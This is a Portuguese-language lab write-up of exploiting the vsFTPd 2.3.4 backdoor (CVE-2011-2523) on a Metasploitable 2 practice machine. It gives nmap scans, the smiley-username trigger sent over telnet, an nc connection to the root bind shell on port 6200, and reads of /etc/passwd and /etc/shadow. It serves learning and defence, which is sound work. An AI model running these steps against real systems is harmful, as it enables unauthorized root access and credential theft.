
Projeto: exploração de backdoor do vsFTPd 2.3.4 (CVE-2011-2523) no Metasploitable 2.
Este projeto demonstra um fluxo de trabalho de teste de penetração contra uma máquina deliberadamente vulnerável, Metasploitable 2. O objetivo era identificar, explorar e analisar uma vulnerabilidade conhecida no serviço FTP, alcançando finalmente acesso de root e avaliando o impacto de segurança.
192.168.56.0/24)Verificado o sistema alvo e sua configuração de rede:
whoami
hostname
ifconfig

Confirmada a conectividade de rede entre atacante e alvo:
ping 192.168.56.101

vsFTPd 2.3.4)Realizou a descoberta de hosts:
nmap -sn 192.168.56.0/24
Identificou hosts ativos na rede.

nmap 192.168.56.101
Descobriu múltiplas portas abertas, incluindo:

nmap -sV 192.168.56.101
Identificou o serviço FTP em execução:
vsFTPd 2.3.4
Uma varredura completa de serviços e baseada em scripts está incluída nos arquivos de suporte: Resultado da Varredura Nmap.

O serviço FTP estava executando uma versão vulnerável conhecida:
vsFTPd 2.3.4
Esta versão do vsFTPd foi distribuída com um backdoor malicioso que é acionado quando um nome de usuário contendo :) é usado durante a autenticação.
Após a ativação, o serviço abre um bind shell na porta 6200, permitindo acesso remoto não autorizado.
Acionou o backdoor usando Telnet:
telnet 192.168.56.101 21
USER test:)
PASS test

Conectou-se ao backdoor usando Netcat:
nc 192.168.56.101 6200

whoami
root
Acesso root obtido com sucesso

Após obter acesso root, foi realizada enumeração básica do sistema:
cat /etc/passwd
cat /etc/shadow
/etc/shadow

Este laboratório demonstra como um único serviço vulnerável pode levar ao comprometimento total do sistema. Ele destaca a importância da configuração adequada do serviço, gerenciamento de patches e minimização de superfícies de ataque expostas.
Esta foi a primeira vez que explorei manualmente um backdoor do mundo real. Aprendi como uma única string de nome de usuário malicioso (:)) pode acionar acesso de root, o que reforçou por que a enumeração de serviços e a detecção de versão são tão importantes no reconhecimento. Também me senti mais confortável com comandos básicos de pós-exploração no Linux, como ler /etc/shadow e entender a aparência real de hashes de credenciais.
Este foi um ambiente de laboratório controlado usando o Metasploitable 2, uma máquina intencionalmente vulnerável. O backdoor do vsFTPd 2.3.4 é um CVE conhecido (CVE-2011-2523) de 2011, portanto isso não reflete um cenário real moderno. Em uma avaliação real, etapas adicionais como evasão, bypass de logs ou pivoting seriam necessárias. Este projeto focou em entender os mecanismos principais do exploit, não um teste de penetração completo.